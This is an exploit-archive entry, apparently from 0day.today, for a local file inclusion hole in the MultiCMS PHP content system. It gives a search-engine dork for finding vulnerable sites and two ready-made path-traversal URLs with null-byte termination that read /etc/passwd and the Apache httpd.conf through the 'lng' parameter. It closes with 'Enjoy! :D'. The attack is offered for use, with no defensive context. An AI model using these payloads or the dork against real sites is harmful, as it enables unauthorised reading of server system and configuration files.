MultiCMS Local File Inclusion Vulnerbility

2011-01-30T00:00:00
ID 1337DAY-ID-15338
Type zdt
Reporter R3VAN_BASTARD
Modified 2011-01-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
           http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
 
Enjoy! :D



#  0day.today [2016-04-20]  #